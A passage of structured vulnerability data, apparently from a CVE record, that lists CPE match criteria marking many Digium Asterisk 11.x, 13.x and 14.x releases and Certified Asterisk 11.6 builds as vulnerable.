              "criteria": "cpe:2.3:a:digium:asterisk:13.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE5794B6-246C-415E-8E20-56447F152488",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E726CA39-A763-4422-B59E-E9E12518EA4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A96EB57-835A-45B4-82F5-31F925A85629",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "206F1DC9-9E8F-4497-A354-4A14711993DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D428364-E2AD-4BC6-9329-71793BC0EB61",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "08963910-E0BD-4487-B669-60E0BFA79863",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "86B16D04-3808-4380-8F64-0C36B185C1F2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3BD16A9-24BC-4FC1-81BA-A6D1FEF38D35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68BAAD53-DE75-41CA-BF60-C0363029D3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CDC383B3-27EF-4C37-94BE-F0D41B34CAFC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A7824B34-06C3-403B-B6F3-C850D54438EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "17E86941-98F6-45A5-8646-6876F74D909F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6DB27C0-C74E-4E6A-AA63-09CFE73C2EF6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6C443A3B-DF96-4A68-B046-DE13689CA974",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5F3AC9AE-288C-4F0E-BF15-C3F4AF09D8E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "796A6021-9FCA-4354-A47C-7500C363C168",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EBB9D073-195F-4C2A-932E-7F027710DB25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "604E58C8-9B81-4992-8993-4A6CB876EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "077C4CB8-1FDE-45D3-82E6-CE09A22809B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3CDB96CA-5AAE-4B39-8E01-2E72E3B476AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8EB33EC3-CDE0-40BD-B269-512AE074D278",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "363FA95F-03EF-4D6A-A40D-76D285D16255",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA96DC31-4BAC-4C5A-923C-EBBFFC7ABB52",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C949D5F5-6C0B-4B17-85B6-3A77D08CF967",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D413741-BDB7-496D-A01B-75E2A98FDB5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "29130F7F-DE00-43E1-A4A6-8F1F95D5CB19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "25E94EC0-F577-4B2B-8B11-DC76278CDD42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "101AD474-9B89-483D-84E8-08012677C55C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D57E41F6-C2CF-4183-A78A-9531A88FB65D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB1F9BB8-F951-427E-B770-69C2ACEBDB28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C4CE405-E923-4C9C-849A-D1031C4DB493",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C039C0CE-9C9C-4D85-8D7C-574DCF9D920B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.01:*:*:*:*:*:*:*",
              "matchCriteriaId": "A1B2F2CC-18C3-46E7-8E7F-970622A710C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "04ECDFF1-9718-4FAE-B45B-4F8CCA82829E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D2C4DA60-5701-4BD0-B2F9-D93B9E64111F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B12834D-2AF1-4AD1-AB23-859CAA5D3210",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.02:*:*:*:*:*:*:*",
              "matchCriteriaId": "89036D04-EA04-4041-9694-6768478D35F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B19070D3-9F03-43C7-9F31-9A54BD5F2441",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E39BAA74-50A8-4087-8FF8-7C5922121319",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D29C253-B403-4B00-A626-3E3A920DC018",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E9D8FA2-21EA-4384-8001-118DA7C959F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3368DE88-7009-46A0-93F4-4D52BAD3D173",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "26586127-B68B-4476-8182-C49B1B1DCDC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D1EFDCC-983E-4227-9FD5-456C16610BC8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DFA7DBAD-BCA6-47D1-A92E-4EB7941F55F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "02C6C827-97A6-4287-8B3E-DE29054242B3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9BE4F7C1-BB82-44BA-BBFD-9F660330EC15",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E4FCA146-5A72-4746-BE23-63271FBC4D47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0C90BB-C3FE-4A75-B739-0236C4256F7E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46BD9466-0BC9-4B4D-928F-240CD46D306C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "06F456AD-19D3-49EF-82B1-07370F6499AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "24A9997E-D0DC-45B0-B4DB-308667FA820E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "26202E79-98E0-4533-B4AE-1ABB2477F5A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C3D7384F-DF1B-4ED7-B1D5-885B95774DDB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9FD404B4-2B0A-4D7A-8CF6-E2C6B4BACBB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7BE4127D-8123-4408-86D3-08168A4501B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8836F348-66DF-43BC-9962-946018D13127",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "1453BB31-D674-4A05-AB2A-2502D127C3E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "868865A1-E074-4DB0-A119-D24C5C53FEF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1794440C-7068-4673-9142-6221B8A39E5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C5CF286B-3377-4AE9-A7B9-8535641D639A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B3D89C7-909F-419A-9EE8-A1F0D02934EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "50EC8D9D-3483-4080-8000-496343BC8BFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6695F632-6AC4-400F-B513-280304ABC1F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A3423C40-240A-4237-8B0F-A4B4ED421C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "03298D9F-CFB8-48F9-BD0C-8A0BEB0760C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A70420A8-8571-4528-98E1-72BE00270C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38230656-6242-4D24-AA67-F42A6FA2FC7F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "20ED9FC3-5E56-4AE7-903F-267CAE7F2CA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84F88075-9935-45BF-88B7-21ACE8AAB314",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "283793E4-0AE8-48D9-ABCF-70E44FE55C4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0F79D5F-EB28-417A-86DF-053D6EDBA161",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4A036F91-70E0-4E97-9896-EEE97BE3C20E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C92ECBCD-1EE3-498A-B3A4-22BF8EFD2EE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4EABFC3-24FA-4441-9F2B-650D90AE5CC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3DA61A22-3DD0-46A3-8C13-F25F4F03FD35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2026FD07-103C-4691-AFA4-88C490382F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "791700CD-E007-489E-9BC6-37025CAA8144",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "65607103-4284-430A-8212-AC1DCFFFA778",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4061B4C7-8315-450C-866A-C4F3A6BCB1A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C6EA7154-7F08-4E43-9270-E617632230AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "00099DC9-D437-429B-9D08-F0DFA4942A6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "4149F36C-D455-415F-93D7-F92EEE41419D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2DC51129-8F38-4505-90FB-4FFDED45BABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4CA571E0-B513-47AA-95BE-EB4DD2AA91E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "89504BDC-82F7-4813-9C1E-456C9ACC6FB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "118C550E-79A8-431E-BADB-710EEEEDC6C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "96C7950F-41D1-46B5-BA62-E8450CB81244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C9A32ECC-E208-4834-8EF7-FEF7A3495041",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5DF6BC60-23F5-46A1-83F8-F4BCDEF196EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AA3E0D41-2E6E-4294-8E56-1A738A7F9AA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D16109B8-4CDF-46FC-9AD9-A158E532791B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "9DCAA174-3CA3-49DB-BA19-D2BCF4F8953F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FD4D1A5A-99A3-4D23-B40C-BBE11EA5B325",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0F5EE428-98FF-42BC-9F61-311327B8F610",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CBA2FD08-D761-410F-9804-A76F0DD77349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74B34C21-D90B-4E32-BBA6-7773DB663F18",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "90996D49-5731-4F7D-9DBE-D0599A5D85A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D3C91C8D-707D-443D-985F-FA3EDB181208",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "400EA2E1-B178-467F-BBC2-1B2ECEDE662A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E00A6C7-D3CF-40B5-A586-06E09C5AA1A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.22.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E25D043-EE0D-49A5-A468-03EDD9CFE0EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CA17630B-444D-4AE4-B582-F8106C4EEFDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "62A20D6B-62FE-440D-BC58-F764AAA5562B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F2AE880B-2FA2-42BB-BEBF-771E18FDA141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC982D1B-B018-474E-94BE-2157C21276C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.24.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F26815C8-8E43-4C26-947B-986EFFF0ACE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "03E8213E-650F-4C95-B9E5-753E7784EF5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.25.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "00B8F794-A7F2-4B8F-B36C-55E61DC6939A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B7FC3A1-AFB0-4280-BFC5-68F61CFD0AF2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "5CEBE67E-A3E5-4BC9-8740-4F51123CC9F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert11:*:*:*:*:*:*",
              "matchCriteriaId": "CD094E25-5E10-4564-9A4D-BE5A14C2815F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert12:*:*:*:*:*:*",
              "matchCriteriaId": "B6873174-0109-402F-ADCA-B1635F441FD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert13:*:*:*:*:*:*",
              "matchCriteriaId": "B529CD2F-2958-44E6-839A-3E4FE392B1F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14:*:*:*:*:*:*",
              "matchCriteriaId": "B961BF46-DEF7-4804-AF9A-D13F160FA213",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DDC801D4-7A69-4855-8757-24ACE70D784B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "60C2B8F0-7722-48B5-89AA-435F52CBC0A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert15:*:*:*:*:*:*",
              "matchCriteriaId": "B9305CA8-835C-4DFF-9CD8-C1072BACED42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert16:*:*:*:*:*:*",
              "matchCriteriaId": "B3729EA6-3949-4854-80D4-DC5587161FBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:*:*:*:*",
